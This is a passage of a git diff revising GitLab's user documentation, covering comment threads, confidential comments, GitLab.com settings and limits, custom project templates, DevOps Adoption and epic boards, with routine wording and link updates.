+You can make a comment confidential, so that it is visible only to project members +who have at least the Reporter role. - +1. Below the comment, select the **Make this comment confidential** checkbox. +1. Select **Comment**. -From now on, any threads on a diff are resolved by default if a push -makes that diff section outdated. Threads on lines that don't change and -top-level resolvable threads are not automatically resolved. + -## Commit threads +## Show only comments -You can add comments and threads to a particular commit under your -project's **Repository > Commits**. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/26723) in GitLab 11.5. -WARNING: -Threads created this way are lost if the commit ID changes after a -force push. +For issues and merge requests with many comments, you can filter the page to show comments only. -## Threaded discussions +1. Open a merge request's **Discussion** tab, or epic or issue's **Overview** tab. +1. On the right side of the page, select from the filter: + - **Show all activity**: Display all user comments and system notes + (issue updates, mentions from other issues, changes to the description, and so on). + - **Show comments only**: Display only user comments. + - **Show history only**: Display only activity notes. -While resolvable threads are only available to merge request diffs, -threads can also be added without a diff. You can start a specific -thread which looks like a thread, on issues, commits, snippets, and -merge requests. + -To start a threaded discussion, select the **Comment** button toggle dropdown, -select **Start thread**, and then select **Start thread** when you're ready to -post the comment. +GitLab saves your preference, so it persists when you visit the same page again +from any device you're logged into. - +## Assign an issue to the commenting user -This posts a comment with a single thread to allow you to discuss specific -comments in greater detail. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/191455) in GitLab 13.1. - +You can assign an issue to a user who made a comment. -## Image threads +1. In the comment, select the **More Actions** menu. +1. Select **Assign to commenting user**. -Sometimes a thread is revolved around an image. With image threads, -you can easily target a specific coordinate of an image and start a thread -around it. Image threads are available in merge requests and commit detail views. + -To start an image thread, hover your mouse over the image. Your mouse pointer -should convert into an icon, indicating that the image is available for commenting. -Simply click anywhere on the image to create a new thread. +Select the button again to unassign the commenter. - +## Create a thread by replying to a standard comment -After you select the image, a comment form is displayed that would be the start -of your thread. After you save your comment, a new badge is displayed on -top of your image. This badge represents your thread. +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/30299) in GitLab 11.9. -NOTE: -This thread badge is typically associated with a number that is only used as a visual -reference for each thread. In the merge request thread tab, -this badge is indicated with a comment icon, because each thread renders a new -image section. +When you reply to a standard comment, you create a thread. -Image threads also work on diffs that replace an existing image. In this diff view -mode, you can toggle the different view modes and still see the thread point badges. +Prerequisites: -| 2-up | Swipe | Onion Skin | -|:-----------:|:----------:|:----------:| -|  |  |  | +- You must have at least the [Guest role](../permissions.md#project-members-permissions). +- You must be in an issue, merge request, or epic. Commits and snippets threads are not supported. -Image threads also work well with resolvable threads. Resolved threads -on diffs (not on the merge request discussion tab) appear collapsed on page -load and have a corresponding badge counter to match the counter on the image. +To create a thread by replying to a comment: - +1. On the top right of the comment, select **{comment}** (**Reply to comment**). -## Lock discussions +  -For large projects with many contributors, it may be useful to stop threads -in issues or merge requests in these scenarios: + The reply area is displayed. -- The project maintainer has already resolved the thread and it is not helpful - for continued feedback. -- The project maintainer has already directed new conversation - to newer issues or merge requests. -- The people participating in the thread are trolling, abusive, or otherwise - being unproductive. +1. Type your reply. +1. Select **Comment** or **Add comment now** (depending on where in the UI you are replying). -In these cases, a user with Developer permissions or higher in the project can lock (and unlock) -an issue or a merge request, using the "Lock" section in the sidebar. For issues, -a user with Reporter permissions can lock (and unlock). +The top comment is converted to a thread. -| Unlock | Lock | -| :-----------: | :----------: | -|  |  | +## Create a thread without replying to a comment -System notes indicate locking and unlocking. +You can create a thread without replying to a standard comment. - +Prerequisites: -In a locked issue or merge request, only team members can add new comments and -edit existing comments. Non-team members are restricted from adding or editing comments. +- You must have at least the [Guest role](../permissions.md#project-members-permissions). +- You must be in an issue, merge request, commit, or snippet. -| Team member | Non-team member | -| :-----------: | :----------: | -|  |  | +To create a thread: -Additionally, locked issues and merge requests can't be reopened. +1. Type a comment. +1. Below the comment, to the right of the **Comment** button, select the down arrow (**{chevron-down}**). +1. From the list, select **Start thread**. +1. Select **Start thread** again. -## Confidential Comments +A threaded comment is created. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207473) in GitLab 13.9. -> - [Deployed behind a feature flag](../feature_flags.md), disabled by default. -> - Disabled on GitLab.com. -> - Not recommended for production use. -> - To use in GitLab self-managed instances, ask a GitLab administrator to enable it. **(FREE SELF)** + -WARNING: -This feature might not be available to you. Check the **version history** note above for details. +## Resolve a thread -When creating a comment, you can make it visible only to the project members (users with Reporter and higher permissions). +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/5022) in GitLab 8.11. +> - Resolvable threads can be added only to merge request diffs. +> - Resolving comments individually was [removed](https://gitlab.com/gitlab-org/gitlab/-/issues/28750) in GitLab 13.6. -To create a confidential comment, select the **Make this comment confidential** check box before you submit it. +You can resolve a thread when you want to finish a conversation. - +Prerequisites: -## Filtering notes +- You must have at least the [Developer role](../permissions.md#project-members-permissions) + or be the author of the change being reviewed. +- You must be in an issue, merge request, commit, or snippet. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/26723) in GitLab 11.5. +To resolve a thread: -For issues with many comments like activity notes and user comments, sometimes -finding useful information can be hard. There is a way to filter comments from single notes and threads for merge requests and issues. +1. Go to the thread. +1. Do one of the following: + - In the top right of the original comment, select the **Resolve thread** (**{check-circle}**) icon. + - Below the last reply, in the **Reply** field, select **Resolve thread**. + - Below the last reply, in the **Reply** field, enter text, select the **Resolve thread** checkbox, and select **Add comment now**. -From a merge request's **Discussion** tab, or from an epic/issue overview, find the filter's dropdown menu on the right side of the page, from which you can choose one of the following options: +At the top of the page, the number of unresolved threads is updated. -- **Show all activity**: displays all user comments and system notes - (issue updates, mentions from other issues, changes to the description, etc). -- **Show comments only**: only displays user comments in the list. -- **Show history only**: only displays activity notes. + - +### Move all unresolved threads in a merge request to an issue -After you select one of the filters in a given issue or merge request, GitLab saves -your preference, so that it persists when you visit the same page again -from any device you're logged into. +If you have multiple unresolved threads in a merge request, you can +create an issue to resolve them separately. -## Start a thread by replying to a standard comment +- In the merge request, at the top of the page, select **Resolve all threads in new issue**. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/30299) in GitLab 11.9 +  -To reply to a standard (non-thread) comment, you can use the **Reply to comment** button. +All threads are marked as resolved and a link is added from the merge request to +the newly created issue. - +### Move one unresolved thread in a merge request to an issue -The **Reply to comment** button is only displayed if you have permissions to reply to an existing thread, or start a thread from a standard comment. +If you have one specific unresolved thread in a merge request, you can +create an issue to resolve it separately. -Selecting the **Reply to comment** button brings the reply area into focus and you can type your reply. +- In the merge request, under the last reply to the thread, next to the + **Resolve thread** button, select **Resolve this thread in a new issue**. - +  -Replying to a non-thread comment converts the non-thread comment to a -thread after the reply is submitted. This conversion is considered an edit -to the original comment, so a note about when it was last edited appears underneath it. +The thread is marked as resolved and a link is added from the merge request to +the newly created issue. -This feature exists only for issues, merge requests, and epics. Commits, snippets, and merge request diff threads are -not supported yet. +### Prevent merge unless all threads are resolved -## Assign an issue to the commenting user +You can prevent merge requests from being merged until all threads are +resolved. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/191455) in GitLab 13.1. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > General**. +1. Expand **Merge requests**. +1. Under **Merge checks**, select the **All discussions must be resolved** checkbox. +1. Select **Save changes**. -You can assign an issue to a user who made a comment. +### Automatically resolve threads in a merge request when they become outdated -In the comment, select the **More Actions** menu, and then select **Assign to commenting user**. +You can set merge requests to automatically resolve threads when lines are modified +with a new push. -Select the button again to unassign the commenter. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > General**. +1. Expand **Merge requests**. +1. Under **Merge options**, select the + **Automatically resolve merge request diff discussions when they become outdated** checkbox. +1. Select **Save changes**. - +Threads are now resolved if a push makes a diff section outdated. +Threads on lines that don't change and top-level resolvable threads are not resolved. -## Enable or disable Confidential Comments **(FREE SELF)** +## Enable or disable confidential comments **(FREE SELF)** -Confidential Comments is under development and not ready for production use. It is +Confidential comments are under development and not ready for production use. The feature is deployed behind a feature flag that is **disabled by default**. [GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) can enable it. diff --git a/doc/user/gitlab_com/index.md b/doc/user/gitlab_com/index.md index f371de30b88..ef458db67f0 100644 --- a/doc/user/gitlab_com/index.md +++ b/doc/user/gitlab_com/index.md @@ -6,12 +6,12 @@ info: To determine the technical writer assigned to the Stage/Group associated w # GitLab.com settings **(FREE SAAS)** -This page contains information about the settings that are used on -[GitLab.com](https://about.gitlab.com/pricing/). +This page contains information about the settings that are used on GitLab.com, available to +[GitLab SaaS](https://about.gitlab.com/pricing/) customers. ## SSH host keys fingerprints -Below are the fingerprints for GitLab.com's SSH host keys. The first time you +Below are the fingerprints for SSH host keys on GitLab.com. The first time you connect to a GitLab.com repository, one of these keys is displayed in the output. | Algorithm | MD5 (deprecated) | SHA256 | @@ -39,6 +39,13 @@ and has its own dedicated IP address (`192.237.158.143`). The IP address for `mg.gitlab.com` is subject to change at any time. +### Service Desk custom mailbox + +On GitLab.com, there's a mailbox configured for Service Desk with the email address: +`contact-project+%{key}@incoming.gitlab.com`. To use this mailbox, configure the +[custom suffix](../project/service_desk.md#configuring-a-custom-email-address-suffix) in project +settings. + ## Backups [See our backup strategy](https://about.gitlab.com/handbook/engineering/infrastructure/production/#backups). @@ -97,14 +104,14 @@ which is part of [GitLab CI/CD](#gitlab-cicd). ## GitLab CI/CD -Below are the current settings regarding [GitLab CI/CD](../../ci/README.md). +Below are the current settings regarding [GitLab CI/CD](../../ci/index.md). Any settings or feature limits not listed here are using the defaults listed in the related documentation. -| Setting | GitLab.com | Default | -|-------------------------------------|------------|---------| -| Artifacts maximum size (compressed) | 1 GB | 100 MB | -| Artifacts [expiry time](../../ci/yaml/README.md#artifactsexpire_in) | From June 22, 2020, deleted after 30 days unless otherwise specified (artifacts created before that date have no expiry). | deleted after 30 days unless otherwise specified | +| Setting | GitLab.com | Default | +|-------------------------------------|-------------|---------| +| Artifacts maximum size (compressed) | 1 GB | 100 MB | +| Artifacts [expiry time](../../ci/yaml/index.md#artifactsexpire_in) | From June 22, 2020, deleted after 30 days unless otherwise specified (artifacts created before that date have no expiry). | deleted after 30 days unless otherwise specified | | Scheduled Pipeline Cron | `*/5 * * * *` | `3-59/10 * * * *` | | [Max jobs in active pipelines](../../administration/instance_limits.md#number-of-jobs-in-active-pipelines) | `500` for Free tier, unlimited otherwise | Unlimited | | [Max CI/CD subscriptions to a project](../../administration/instance_limits.md#number-of-cicd-subscriptions-to-a-project) | `2` | Unlimited | @@ -118,14 +125,14 @@ the related documentation. GitLab.com has the following [account limits](../admin_area/settings/account_and_limit_settings.md) enabled. If a setting is not listed, it is set to the default value. -If you are near or over the repository size limit, you can -[reduce your repository size with Git](../project/repository/reducing_the_repo_size_using_git.md). +If you are near or over the repository size limit, you can either +[reduce your repository size with Git](../project/repository/reducing_the_repo_size_using_git.md) or [purchase additional storage](https://about.gitlab.com/pricing/licensing-faq/#can-i-buy-more-storage). -| Setting | GitLab.com | Default | -|-------------------------------|------------|---------| +| Setting | GitLab.com | Default | +|-------------------------------|-------------|---------| | [Repository size including LFS](../admin_area/settings/account_and_limit_settings.md#repository-size-limit) | 10 GB | Unlimited | -| Maximum import size | 5 GB | Unlimited ([Modified](https://gitlab.com/gitlab-org/gitlab/-/issues/251106) from 50MB to unlimited in GitLab 13.8. | -| Maximum attachment size | 10 MB | 10 MB | +| Maximum import size | 5 GB | Unlimited ([Modified](https://gitlab.com/gitlab-org/gitlab/-/issues/251106) from 50MB to unlimited in GitLab 13.8.) | +| Maximum attachment size | 10 MB | 10 MB | NOTE: `git push` and GitLab project imports are limited to 5 GB per request through @@ -138,7 +145,7 @@ GitLab.com uses the IP ranges `34.74.90.64/28` and `34.74.226.0/24` for traffic fleet. This whole range is solely allocated to GitLab. You can expect connections from webhooks or repository mirroring to come from those IPs and allow them. -GitLab.com is fronted by Cloudflare. For incoming connections to GitLab.com you might need to allow CIDR blocks of Cloudflare ([IPv4](https://www.cloudflare.com/ips-v4) and [IPv6](https://www.cloudflare.com/ips-v6)). +GitLab.com is fronted by Cloudflare. For incoming connections to GitLab.com, you might need to allow CIDR blocks of Cloudflare ([IPv4](https://www.cloudflare.com/ips-v4) and [IPv6](https://www.cloudflare.com/ips-v6)). For outgoing connections from CI/CD runners, we are not providing static IP addresses. All GitLab runners are deployed into Google Cloud Platform (GCP). Any @@ -164,32 +171,32 @@ also load certain page content directly from common public CDN hostnames. The following limits apply for [Webhooks](../project/integrations/webhooks.md): -| Setting | GitLab.com | Default | -|----------------------|------------|---------| +| Setting | GitLab.com | Default | +|----------------------|-------------|---------| | [Webhook rate limit](../../administration/instance_limits.md#webhook-rate-limit) | `120` calls per minute for GitLab Free, unlimited for GitLab Premium and GitLab Ultimate | Unlimited | | [Number of webhooks](../../administration/instance_limits.md#number-of-webhooks) | `100` per project, `50` per group | `100` per project, `50` per group | -| Maximum payload size | 25 MB | 25 MB | +| Maximum payload size | 25 MB | 25 MB | ## Shared runners GitLab has shared runners on GitLab.com that you can use to run your CI jobs. -For more information, see [choosing a runner](../../ci/runners/README.md). +For more information, see [choosing a runner](../../ci/runners/index.md). ## Sidekiq GitLab.com runs [Sidekiq](https://sidekiq.org) with arguments `--timeout=4 --concurrency=4` and the following environment variables: -| Setting | GitLab.com | Default | -|----------------------------------------|------------|-----------| -| `SIDEKIQ_DAEMON_MEMORY_KILLER` | - | `1` | -| `SIDEKIQ_MEMORY_KILLER_MAX_RSS` | `2000000` | `2000000` | -| `SIDEKIQ_MEMORY_KILLER_HARD_LIMIT_RSS` | - | - | -| `SIDEKIQ_MEMORY_KILLER_CHECK_INTERVAL` | - | `3` | -| `SIDEKIQ_MEMORY_KILLER_GRACE_TIME` | - | `900` | -| `SIDEKIQ_MEMORY_KILLER_SHUTDOWN_WAIT` | - | `30` | -| `SIDEKIQ_LOG_ARGUMENTS` | `1` | `1` | +| Setting | GitLab.com | Default | +|----------------------------------------|-------------|-----------| +| `SIDEKIQ_DAEMON_MEMORY_KILLER` | - | `1` | +| `SIDEKIQ_MEMORY_KILLER_MAX_RSS` | `2000000` | `2000000` | +| `SIDEKIQ_MEMORY_KILLER_HARD_LIMIT_RSS` | - | - | +| `SIDEKIQ_MEMORY_KILLER_CHECK_INTERVAL` | - | `3` | +| `SIDEKIQ_MEMORY_KILLER_GRACE_TIME` | - | `900` | +| `SIDEKIQ_MEMORY_KILLER_SHUTDOWN_WAIT` | - | `30` | +| `SIDEKIQ_LOG_ARGUMENTS` | `1` | `1` | NOTE: The `SIDEKIQ_MEMORY_KILLER_MAX_RSS` setting is `16000000` on Sidekiq import @@ -362,7 +369,7 @@ See [non-configurable limits](../../security/rate_limits.md#non-configurable-lim for information on rate limits that are not configurable, and therefore also used on GitLab.com. -## GitLab.com Logging +## GitLab.com logging We use [Fluentd](https://gitlab.com/gitlab-com/runbooks/tree/master/logging/doc#fluentd) to parse our logs. Fluentd sends our logs to @@ -377,7 +384,7 @@ You can view more information in our runbooks such as: - Our [current log retention policies](https://gitlab.com/gitlab-com/runbooks/-/tree/master/docs/logging#retention) - A [diagram of our logging infrastructure](https://gitlab.com/gitlab-com/runbooks/-/tree/master/docs/logging#logging-infrastructure-overview) -### Job Logs +### Job logs By default, GitLab does not expire job logs. Job logs are retained indefinitely, and can't be configured on GitLab.com to expire. You can erase job logs @@ -390,7 +397,7 @@ In addition to the GitLab Enterprise Edition Omnibus install, GitLab.com uses the following applications and settings to achieve scale. All settings are publicly available at [chef cookbooks](https://gitlab.com/gitlab-cookbooks). -### Elastic Cluster +### Elastic cluster We use Elasticsearch and Kibana for part of our monitoring solution: diff --git a/doc/user/group/clusters/index.md b/doc/user/group/clusters/index.md index 4de464822f7..0d885183a41 100644 --- a/doc/user/group/clusters/index.md +++ b/doc/user/group/clusters/index.md @@ -66,7 +66,7 @@ automatically. If you're using [Auto DevOps](../../../topics/autodevops/index.md for deployments with a cluster not managed by GitLab, you must ensure: - The project's deployment service account has permissions to deploy to - [`KUBE_NAMESPACE`](../../project/clusters/index.md#deployment-variables). + [`KUBE_NAMESPACE`](../../project/clusters/deploy_to_cluster.md#deployment-variables). - `KUBECONFIG` correctly reflects any changes to `KUBE_NAMESPACE` (this is [not automatic](https://gitlab.com/gitlab-org/gitlab/-/issues/31519)). Editing `KUBE_NAMESPACE` directly is discouraged. @@ -96,14 +96,14 @@ per [multiple Kubernetes clusters](#multiple-kubernetes-clusters) When specifyin this is automatically set as an environment variable (`KUBE_INGRESS_BASE_DOMAIN`) during the [Auto DevOps](../../../topics/autodevops/index.md) stages. -The domain should have a wildcard DNS configured to the Ingress IP address. [More details](../../project/clusters/index.md#base-domain). +The domain should have a wildcard DNS configured to the Ingress IP address. [More details](../../project/clusters/gitlab_managed_clusters.md#base-domain). ## Environment scopes **(PREMIUM)** When adding more than one Kubernetes cluster to your project, you need to differentiate them with an environment scope. The environment scope associates clusters with [environments](../../../ci/environments/index.md) similar to how the -[environment-specific CI/CD variables](../../../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable) +[environment-specific CI/CD variables](../../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) work. While evaluating which environment matches the environment scope of a @@ -122,7 +122,7 @@ For example, if your project has the following Kubernetes clusters: | Test | `test` | Group | | Development| `*` | Group | -And the following environments are set in [`.gitlab-ci.yml`](../../../ci/yaml/README.md): +And the following environments are set in [`.gitlab-ci.yml`](../../../ci/yaml/index.md): ```yaml stages: @@ -163,7 +163,7 @@ are deployed to the Kubernetes cluster, see the documentation for ## Security of runners For important information about securely configuring runners, see -[Security of runners](../../project/clusters/add_remove_clusters.md#security-of-runners) +[Security of runners](../../project/clusters/cluster_access.md#security-of-runners) documentation for project-level clusters. ## More information diff --git a/doc/user/group/contribution_analytics/index.md b/doc/user/group/contribution_analytics/index.md index 12d7eaf2f12..670ecc48370 100644 --- a/doc/user/group/contribution_analytics/index.md +++ b/doc/user/group/contribution_analytics/index.md @@ -8,12 +8,8 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3090) in GitLab 12.2 for subgroups. -With Contribution Analytics you can get an overview of the following activity in your -group: - -- Issues -- Merge requests -- Push events +With Contribution Analytics you can get an overview of the [contribution actions](../../../api/events.md#action-types) in your +group. To view the Contribution Analytics, go to your group and select **Analytics > Contribution**. diff --git a/doc/user/group/custom_project_templates.md b/doc/user/group/custom_project_templates.md index d544003536e..41046477b90 100644 --- a/doc/user/group/custom_project_templates.md +++ b/doc/user/group/custom_project_templates.md @@ -9,25 +9,35 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/6861) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.6. -Custom project templates are useful for organizations that need to create many similar types of -[projects](../project/index.md). -Projects created from these templates serve as a common starting point. +[Group owners](../permissions.md#group-members-permissions) can set a subgroup to +be the source of project templates that are selectable when a new project is created +in the group. These templates can be selected when you go to **New project > Create from template** +in the group and select the **Group** tab. -## Setting up group-level project templates +Every project in the subgroup, but not nested subgroups, can be selected by members +of the group when a new project is created. -To use a custom project template for a new project: +Repository and database information that is copied over to each new project is identical to the +data exported with the [GitLab Project Import/Export](../project/settings/import_export.md). + +To set custom project templates at the instance level, see [Custom instance-level project templates](../admin_area/custom_project_templates.md). -1. [Create a `templates` subgroup](subgroups/index.md). -1. [Add repositories (projects) to that new subgroup](index.md#add-projects-to-a-group), - as your templates. -1. Edit your group's settings to look to your _templates_ subgroup for templates: +## Set up group-level project templates - 1. In the left menu, select **Settings > General**. If you don't have access to the - group's settings, you may not have sufficient privileges (for example, you may need developer - or higher permissions). - 1. Scroll to **Custom project templates** and select **Expand**. If no **Custom project templates** - section displays, make sure you've created a subgroup and added a project (repository) to it. - 1. Select the **templates** subgroup. +To set up custom project templates in a group, add the subgroup that contains the +project templates to the group settings: + +1. In the group, create a [subgroup](subgroups/index.md). +1. [Add projects to the new subgroup](index.md#add-projects-to-a-group) as your templates. +1. In the left menu for the group, go to **Settings > General**. +1. Expand **Custom project templates** and select the subgroup. + +If all enabled [project features](../project/settings/index.md#sharing-and-permissions) +(except for GitLab Pages) are set to **Everyone With Access**, then every project +template in the subgroup is available to every member of the group. + +Any projects added to the subgroup later can be selected the next time a group member +creates a new project. ### Example structure @@ -54,25 +64,6 @@ gitlab.com/acmeco/ ... ``` -### Adjust Settings - -Users can configure a GitLab group that serves as template source under a group's -**Settings > General > Custom project templates**. - -NOTE: -GitLab administrators can [set project templates for an entire GitLab instance](../admin_area/custom_project_templates.md). - -Within this section, you can configure the group where all the custom project templates are sourced. -If all enabled [project features](../project/settings/index.md#sharing-and-permissions) -(except for GitLab Pages) are set to **Everyone With Access**, then every project template directly -under the group namespace is available to every signed-in user. However, private projects are -available only if the user is a member of the project. Also note that only direct subgroups can be -set as the template source. Projects of nested subgroups of a selected template source cannot be -used. - -Repository and database information that are copied over to each new project are identical to the -data exported with the [GitLab Project Import/Export](../project/settings/import_export.md). - <!-- ## Troubleshooting Include any troubleshooting steps that you can foresee. If you know beforehand what issues diff --git a/doc/user/group/devops_adoption/img/group_devops_adoption_v14_0.png b/doc/user/group/devops_adoption/img/group_devops_adoption_v14_0.png Binary files differdeleted file mode 100644 index 91055f660da..00000000000 --- a/doc/user/group/devops_adoption/img/group_devops_adoption_v14_0.png +++ /dev/null diff --git a/doc/user/group/devops_adoption/img/group_devops_adoption_v14_1.png b/doc/user/group/devops_adoption/img/group_devops_adoption_v14_1.png Binary files differnew file mode 100644 index 00000000000..a790a560a9b --- /dev/null +++ b/doc/user/group/devops_adoption/img/group_devops_adoption_v14_1.png diff --git a/doc/user/group/devops_adoption/index.md b/doc/user/group/devops_adoption/index.md index f98325143cc..4332f261481 100644 --- a/doc/user/group/devops_adoption/index.md +++ b/doc/user/group/devops_adoption/index.md @@ -7,14 +7,9 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Group DevOps Adoption **(ULTIMATE)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/321083) in GitLab 13.11 as a [Beta feature](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta). -> - [Deployed behind a feature flag](../../../user/feature_flags.md), disabled by default. -> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/323159) in GitLab 13.12. -> - Enabled on GitLab.com. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-group-devops-adoption). **(ULTIMATE SELF)** - -This in-development feature might not be available for your use. There can be -[risks when enabling features still in development](../../feature_flags.md#risks-when-enabling-features-still-in-development). -Refer to this feature's version history for more details. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/333556) in GitLab 14.1. +> - The Overview tab [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330401) in GitLab 14.1. +> - DAST and SAST metrics [added](https://gitlab.com/gitlab-org/gitlab/-/issues/328033) in GitLab 14.1. Prerequisites: @@ -25,16 +20,17 @@ To access Group DevOps Adoption, go to your group and select **Analytics > DevOp Group DevOps Adoption shows you how individual groups and sub-groups within your organization use the following features: - Dev - - Issues - - Merge Requests - Approvals - Code owners + - Issues + - Merge requests - Sec - - Scans + - DAST + - SAST - Ops - - Runners - - Pipelines - Deployments + - Pipelines + - Runners When managing groups in the UI, you can add your sub-groups with the **Add sub-group to table** button, in the top right hand section of your Groups pages. @@ -45,7 +41,7 @@ With DevOps Adoption you can: - Identify specific sub-groups that are lagging in their adoption of GitLab so you can help them along in their DevOps journey. - Find the sub-groups that have adopted certain features and can provide guidance to other sub-groups on how to use those features. - + ## Enable data processing @@ -64,12 +60,6 @@ Each group appears as a separate row in the table. For each row, a feature is considered "adopted" if it has been used in a project in the given group during the time period (including projects in any sub-groups of the given group). -You should expect adoption to be lower at the beginning of the month, -before you have had an opportunity to use all the features listed in the table. - -In the future [we plan to implement](https://gitlab.com/gitlab-org/gitlab/-/issues/329708) -a rolling 30-day perspective instead. - ## When is a feature considered adopted A feature is considered "adopted" if it has been used anywhere in the group in the specified time. @@ -100,26 +90,3 @@ To add a sub-group to your Group DevOps Adoption report: The sub-group data might not appear immediately, because GitLab requires around a minute to collect the data. - -Please note that the sub-group data might not appear immediately, -because GitLab requires a few moments to collect the data. -Generally the data will be visible in less than one minute. - -## Enable or disable Group DevOps Adoption **(ULTIMATE SELF)** - -Group DevOps Adoption is under development and not ready for production use. It is -deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) -can disable it. - -To disable it: - -```ruby -Feature.disable(:group_devops_adoption) -``` - -To re-enable it: - -```ruby -Feature.enable(:group_devops_adoption) -``` diff --git a/doc/user/group/epics/epic_boards.md b/doc/user/group/epics/epic_boards.md index 3b653a7f3f8..34eebfb9e3b 100644 --- a/doc/user/group/epics/epic_boards.md +++ b/doc/user/group/epics/epic_boards.md @@ -7,17 +7,16 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Epic Boards **(PREMIUM)** > - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/5067) in GitLab 13.10. -> - [Deployed behind a feature flag](../../feature_flags.md), disabled by default. -> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/290039) in GitLab 14.0. -> - Enabled on GitLab.com. -> - Recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](../../../administration/feature_flags.md). +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/290039) in GitLab 14.1. Epic boards build on the existing [epic tracking functionality](index.md) and [labels](../../project/labels.md). Your epics appear as cards in vertical lists, organized by their assigned labels. -To view an epic board, in a group, select **Epics > Boards**. +To view an epic board: + +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Epics > Boards**.  @@ -29,7 +28,8 @@ Prerequisites: To create a new epic board: -1. Go to your group and select **Epics > Boards**. +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Epics > Boards**. 1. In the upper left corner, select the dropdown with the current board name. 1. Select **Create new board**. 1. Enter the new board's title. @@ -77,7 +77,8 @@ Prerequisites: To create a new list: -1. Go to your group and select **Epics > Boards**. +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Epics > Boards**. 1. In the upper-right corner, select **Create list**. 1. In the **New list** column expand the **Select a label** dropdown and select the label to use as list scope. @@ -129,6 +130,15 @@ You can filter by the following: - Author - Label +### View count of issues, weight, and progress of an epic + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/331330) in GitLab 14.1. + +Epics on an epic board show a summary of their issues, weight, and progress. +To see the number of open and closed issues and the completed and incomplete +weight, hover over the issues icon **{issues}**, weight icon **{weight}**, or +progress icon **{progress}**. + ### Move epics and lists > [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/5079) in GitLab 14.0. @@ -170,22 +180,3 @@ To edit the scope of an epic board: - Show or hide the Open and Closed columns. - Select other labels as the board's scope. 1. Select **Save changes**. - -## Enable or disable epic boards - -Epic boards are under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) -can disable it. - -To disable it: - -```ruby -Feature.disable(:epic_boards) -``` - -To enable it: - -```ruby -Feature.enable(:epic_boards) -``` diff --git a/doc/user/group/epics/manage_epics.md b/doc/user/group/epics/manage_epics.md index 89fd32a8db1..f6c3ea6c090 100644 --- a/doc/user/group/epics/manage_epics.md +++ b/doc/user/group/epics/manage_epics.md @@ -5,8 +5,6 @@ group: Product Planning info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -<!-- When adding a new h2 section here, remember to mention it in index.md#manage-epics --> - # Manage epics **(PREMIUM)** This page collects instructions for all the things you can do with [epics](index.md) or in relation @@ -140,6 +138,7 @@ link in the issue sidebar. > - Introduced in [GitLab Ultimate](https://about.gitlab.com/pricing/) 10.5. > - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/37081) to the [Premium](https://about.gitlab.com/pricing/) tier in GitLab 12.8. > - Searching by the user's reaction emoji [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/325630) in GitLab 13.11. +> - Sorting by epic titles [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/331625) in GitLab 14.1. You can search for an epic from the list of epics using filtered search bar (similar to that of issues and merge requests) based on following parameters: @@ -162,6 +161,7 @@ You can also sort epics list by: - Last updated - Start date - Due date +- Title Each option contains a button that can toggle the order between **Ascending** and **Descending**. The sort option and order is saved and used wherever you browse epics, including the diff --git a/doc/user/group/import/img/bulk_imports_v13_8.png b/doc/user/group/import/img/bulk_imports_v13_8.png Binary files differdeleted file mode 100644 index ae4d8567d80..00000000000 --- a/doc/user/group/import/img/bulk_imports_v13_8.png +++ /dev/null diff --git a/doc/user/group/import/img/bulk_imports_v14_1.png b/doc/user/group/import/img/bulk_imports_v14_1.png Binary files differnew file mode 100644 index 00000000000..fb419c1df6c --- /dev/null +++ b/doc/user/group/import/img/bulk_imports_v14_1.png diff --git a/doc/user/group/import/img/import_panel_v13_8.png b/doc/user/group/import/img/import_panel_v13_8.png Binary files differdeleted file mode 100644 index 28d61785098..00000000000 --- a/doc/user/group/import/img/import_panel_v13_8.png +++ /dev/null diff --git a/doc/user/group/import/img/import_panel_v14_1.png b/doc/user/group/import/img/import_panel_v14_1.png Binary files differnew file mode 100644 index 00000000000..28417383b6c --- /dev/null +++ b/doc/user/group/import/img/import_panel_v14_1.png diff --git a/doc/user/group/import/index.md b/doc/user/group/import/index.md index 8bf995a4fd9..d76685f992b 100644 --- 